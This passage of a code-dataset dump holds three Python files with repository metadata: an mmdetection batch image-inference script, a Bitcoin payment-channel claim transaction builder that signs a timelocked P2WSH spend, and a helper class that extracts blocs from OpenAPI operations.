        return context
d397b6b538c4e3913d34403efb0770025b618578 | 1,560 | py | Python | tools/dota/dota_image.py | liuyanyi/mmdetection | d2003536af6f08cb9bd7a75e0444eef03ace4bb3 | [
"Apache-2.0"
] | null | null | null | tools/dota/dota_image.py | liuyanyi/mmdetection | d2003536af6f08cb9bd7a75e0444eef03ace4bb3 | [
"Apache-2.0"
] | null | null | null | tools/dota/dota_image.py | liuyanyi/mmdetection | d2003536af6f08cb9bd7a75e0444eef03ace4bb3 | [
"Apache-2.0"
] | null | null | null | import os
from argparse import ArgumentParser
from mmdet.apis import (inference_detector,
init_detector)
def parse_args():
    """Build and parse the command-line arguments for batch inference."""
    parser = ArgumentParser()
    # Positional arguments: input/output folders plus model files.
    for arg_name, help_text in (('img_dir', 'Image file folder'),
                                ('out_dir', 'Image file output folder'),
                                ('config', 'Config file'),
                                ('checkpoint', 'Checkpoint file')):
        parser.add_argument(arg_name, help=help_text)
    parser.add_argument(
        '--device', default='cuda:0', help='Device used for inference')
    parser.add_argument(
        '--score-thr', type=float, default=0.3, help='bbox score threshold')
    return parser.parse_args()
def main(args):
    """Run inference on every image in args.img_dir and write the rendered
    detections (above args.score_thr) to args.out_dir."""
    # build the model from a config file and a checkpoint file
    model = init_detector(args.config, args.checkpoint, device=args.device)
    for file in os.listdir(args.img_dir):  # iterate over all folder entries
        file_path = os.path.join(args.img_dir, file)
        # Skip sub-directories. The original tested ``os.path.isdir(file)``
        # with the bare entry name (relative to the CWD), so directories
        # inside img_dir were never actually filtered out.
        if os.path.isdir(file_path):
            continue
        # test a single image
        result = inference_detector(model, file_path)
        # show the results
        model.show_result(
            file_path,
            result,
            score_thr=args.score_thr,
            show=False,
            wait_time=0,
            bbox_color=(72, 101, 241),
            text_color=(72, 101, 241),
            out_file=os.path.join(args.out_dir, file)
        )
if __name__ == '__main__':
    # CLI entry point: parse arguments and run batch inference.
    args = parse_args()
    main(args)
| 31.836735 | 76 | 0.608974 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 411 | 0.252147 |
d39a467396d68d59b013218c77d34986d2e3fa03 | 6,698 | py | Python | tx/tx_builder/bitcoin/cust_claim.py | fakecoinbase/boltlabs-incslashlibzkchannels | c0b43790c637f4ffd2956193b16f9ddcea94a3a4 | [
"MIT"
] | 68 | 2020-01-18T22:07:57.000Z | 2022-02-03T02:30:55.000Z | tx/tx_builder/bitcoin/cust_claim.py | fakecoinbase/boltlabs-incslashlibzkchannels | c0b43790c637f4ffd2956193b16f9ddcea94a3a4 | [
"MIT"
] | 2 | 2020-04-29T02:02:49.000Z | 2021-04-08T11:23:48.000Z | tx/tx_builder/bitcoin/cust_claim.py | fakecoinbase/boltlabs-incslashlibzkchannels | c0b43790c637f4ffd2956193b16f9ddcea94a3a4 | [
"MIT"
] | 3 | 2021-04-04T05:04:16.000Z | 2022-01-26T10:14:46.000Z | # p2wsh input (2-of-2 multisig)
# p2wpkh output
import argparse
import hashlib
import ecdsa
def dSHA256(data):
    """Return SHA-256 applied twice to *data* (Bitcoin's double-SHA256)."""
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()
def hash160(s):
    '''Return RIPEMD-160 of SHA-256 of *s* (Bitcoin's HASH160).'''
    sha_digest = hashlib.sha256(s).digest()
    return hashlib.new('ripemd160', sha_digest).digest()
def privkey_to_pubkey(privkey):
    """Derive the compressed SEC public key for a secp256k1 private key.

    The prefix is 0x02 when the point's y coordinate is even, 0x03 when odd.
    """
    signing_key = ecdsa.SigningKey.from_string(privkey, curve=ecdsa.SECP256k1) # Don't forget to specify the curve
    point_bytes = signing_key.get_verifying_key().to_string()
    x_cor, y_cor = point_bytes[:32], point_bytes[32:]
    y_is_even = int.from_bytes(y_cor, byteorder="big", signed=True) % 2 == 0
    prefix = "02" if y_is_even else "03"
    return bytes.fromhex(prefix + x_cor.hex())
################################
# Command-line interface: everything needed to build and sign the spend of
# the customer-close to-self output (outpoint, amounts, keys, timelock).
parser = argparse.ArgumentParser()
# NOTE(review): the help text says "public key", but a private key is
# expected here — it is used below to sign the BIP-143 digest.
parser.add_argument("--cust_close_privkey", "-ccpk", help="public key of cust close to-self output")
parser.add_argument("--output_pubkey", "-cpk", help="pubkey of output for the cust")
parser.add_argument("--merch_disp_pubkey", "-mdpk", help="public key of merchant dispute")
parser.add_argument("--revocation_lock", "-rl", help="revocation lock (hash160{revocation_secret})")
parser.add_argument("--to_self_delay", "-tsd", help="to_self_delay (in unit of blocks) for the merchant's to-self output")
parser.add_argument("--txid", "-tx", help="txid of outpoint as hex string")
parser.add_argument("--index", "-ind", help="index of outpoint")
parser.add_argument("--amount_btc", "-a", help="amount of btc in")
parser.add_argument("--output_btc", "-mo", help="btc to merchant close output")
args = parser.parse_args()
################################
# version is 4-bytes little endian. Version 2 should be default
version = bytes.fromhex("0200 0000")
marker = bytes.fromhex("00") # this must be 00
flag = bytes.fromhex("01") # this must be 01

# Outpoint being spent: txid serialized reversed (little-endian),
# index as a 4-byte little-endian integer.
# (The original computed txid and index twice; the duplicates are removed.)
txID_str = args.txid
txid = (bytes.fromhex(txID_str))[::-1]
tx_index = int(args.index)
index = tx_index.to_bytes(4, byteorder="little", signed=False)

# nSequence carries the relative timelock (to_self_delay, given in hex blocks).
nSequence_as_blocks = int(args.to_self_delay, 16)
sequence = nSequence_as_blocks.to_bytes(4, byteorder="little", signed=False)

# Minimal-length encoding of the same delay, pushed inside the script.
# todo: find a nicer way to do this
l = int(len(args.to_self_delay)/2)
short_sequence = nSequence_as_blocks.to_bytes(l, byteorder="little", signed=False)

# Amounts in satoshi, serialized as 8-byte little-endian integers.
input_amount_sat = int(float(args.amount_btc) * 100000000)
output_value_sat = int(float(args.output_btc) * 100000000)
input_amount = input_amount_sat.to_bytes(8, byteorder="little", signed=True)
output_value = output_value_sat.to_bytes(8, byteorder="little", signed=True)

# Keys: customer's to-self key (private, used to sign) and the merchant's
# dispute-path public key.
cust_close_privkey_hex = args.cust_close_privkey
cust_close_privkey = bytes.fromhex(cust_close_privkey_hex)
cust_close_pubkey = privkey_to_pubkey(cust_close_privkey)

merch_disp_pubkey = bytes.fromhex(args.merch_disp_pubkey)
revocation_lock = bytes.fromhex(args.revocation_lock)

# Witness script of the cust-close to-self output (P2WSH):
# 0x63 OP_IF
# 0xa8 OP_SHA256
# 0x20 OP_DATA - len(revocation_lock) (32 bytes)
#      revocation_lock
# 0x88 OP_EQUALVERIFY
# 0x21 OP_DATA - len(merch_disp_pubkey) (33 bytes)
#      merch_disp_pubkey
# 0x67 OP_ELSE
# 0x__ OP_DATA - len(to_self_delay) (probably ~0x02)
#      to_self_delay
# 0xb2 OP_CHECKSEQUENCEVERIFY
# 0x75 OP_DROP
# 0x21 OP_DATA - len(cust_close_pubkey) (33 bytes)
#      cust_close_pk
# 0x68 OP_ENDIF
# 0xac OP_CHECKSIG
#
# The original comment described the opcodes as 0xa9 OP_HASH160 / 0x14, but
# the bytes below emit 0xa8 OP_SHA256 with a 32-byte push; the comment now
# matches the code.
# NOTE(review): the CLI help still calls revocation_lock hash160(secret),
# while the script verifies it with OP_SHA256 — confirm the intended hash.
#
# (The original recomputed nSequence_as_blocks / l / short_sequence here,
# identical to the values computed above; the duplicates are removed.)
cust_close_script = (
    bytes.fromhex("63 a8 20")
    + revocation_lock
    + bytes.fromhex("88 21")
    + merch_disp_pubkey
    + bytes.fromhex("67")
    + (len(short_sequence)).to_bytes(1, byteorder="little", signed=False)
    + short_sequence
    + bytes.fromhex("b2 75 21")
    + cust_close_pubkey
    + bytes.fromhex("68 ac")
)

# send output to another P2WPKH address (0x00 version, 20-byte key hash)
output_pubkey = bytes.fromhex(args.output_pubkey)
output_scriptPK = bytes.fromhex("0014") + hash160(output_pubkey)
# Fixed transaction fields: no locktime, SIGHASH_ALL, one input, one output.
locktime = bytes.fromhex("00000000")
sighash = bytes.fromhex("01000000")
sighash_type_flag = bytes.fromhex("01")
tx_in_count = bytes.fromhex("01")
tx_out_count = bytes.fromhex("01")

##########################################
# Assemble the BIP-143 sighash preimage for the single segwit input.

# hashPrevOuts and outpoint
outpoint = (
    txid
    + index
)
hashPrevOuts = dSHA256(outpoint)

# hashSequence
hashSequence = dSHA256(sequence)

# hashOutputs and output (value || scriptPubKey with 1-byte length prefix)
output = (
    output_value
    + (len(output_scriptPK)).to_bytes(1, byteorder="little", signed=False)
    + output_scriptPK
)
hashOutputs = dSHA256(output)

# scriptCode: the witness script, length-prefixed
scriptcode = (
    (len(cust_close_script)).to_bytes(1, byteorder="little", signed=False)
    + cust_close_script
)

# serialized bip_143 object
bip_143 = (
    version
    + hashPrevOuts
    + hashSequence
    + outpoint
    + scriptcode
    + input_amount
    + sequence
    + hashOutputs
    + locktime
    + sighash
)

# Sign the double-SHA256 of the preimage with the customer's close key,
# producing a canonical DER signature.
hashed_bip_143 = dSHA256(bip_143)

signing_key_cust_close = ecdsa.SigningKey.from_string(cust_close_privkey, curve=ecdsa.SECP256k1) # Don't forget to specify the curve
signature_cust_close = signing_key_cust_close.sign_digest(hashed_bip_143, sigencode=ecdsa.util.sigencode_der_canonize)
# Witness stack for the input: three items, each length-prefixed —
# <sig||sighash_byte> <empty (false)> <witnessScript>.
witness = (
    # indicate the number of stack items for the txin
    bytes.fromhex("03")

    # signature (DER signature plus the 1-byte sighash flag)
    + (len(signature_cust_close)+1).to_bytes(1, byteorder="little", signed=False)
    + signature_cust_close
    + sighash_type_flag

    # So that we enter OP_ELSE in the script (empty item == false for OP_IF)
    + bytes.fromhex("00")

    # witnessScript
    # This is the script that the creator of this transaction needs to provide, and
    # solve, in order to redeem the UTXO listed in the input
    + (len(cust_close_script)).to_bytes(1, byteorder="little", signed=False)
    + cust_close_script
)

# Segwit inputs carry an empty scriptSig (just a zero length byte).
scriptSig = (
    bytes.fromhex("00") # length of empty scriptSig
)

# Final serialized segwit transaction:
# version || marker || flag || inputs || outputs || witness || locktime
final_tx = (
    version
    + marker
    + flag
    + tx_in_count
    + outpoint
    + scriptSig
    + sequence
    + tx_out_count
    + output
    + witness
    + locktime
)

print(final_tx.hex())

# print(merch_close_script.hex())
| 30.584475 | 132 | 0.711854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,418 | 0.361003 |
d39a71a428e5735148b326afbfd3b4fdc0fd033f | 852 | py | Python | api/api/model/ApiOperations.py | pampi9/api-handler | 899926baae6a12613bfc5faac1ecd0c223ec3226 | [
"Apache-2.0"
] | null | null | null | api/api/model/ApiOperations.py | pampi9/api-handler | 899926baae6a12613bfc5faac1ecd0c223ec3226 | [
"Apache-2.0"
] | null | null | null | api/api/model/ApiOperations.py | pampi9/api-handler | 899926baae6a12613bfc5faac1ecd0c223ec3226 | [
"Apache-2.0"
class ApiOperations:
    """
    Extract selected blocs from each operation (HTTP method) of an
    OpenApiSpecs paths/<endpoint> definition.
    """

    def __init__(self, resource, parts=None):
        """
        Build ``self.operations``: method -> {part: value or None}.

        :param resource: the paths/<endpoint> mapping to extract from
        :param parts: single bloc names to extract (defaults to
            parameters, responses and requestBody)
        """
        if parts is None:
            parts = ["parameters", "responses", "requestBody"]
        self.operations = {
            method: {part: (details[part] if part in details else None)
                     for part in parts}
            for (method, details) in resource.items()
        }
| 37.043478 | 95 | 0.597418 | 851 | 0.998826 | 0 | 0 | 0 | 0 | 0 | 0 | 340 | 0.399061 |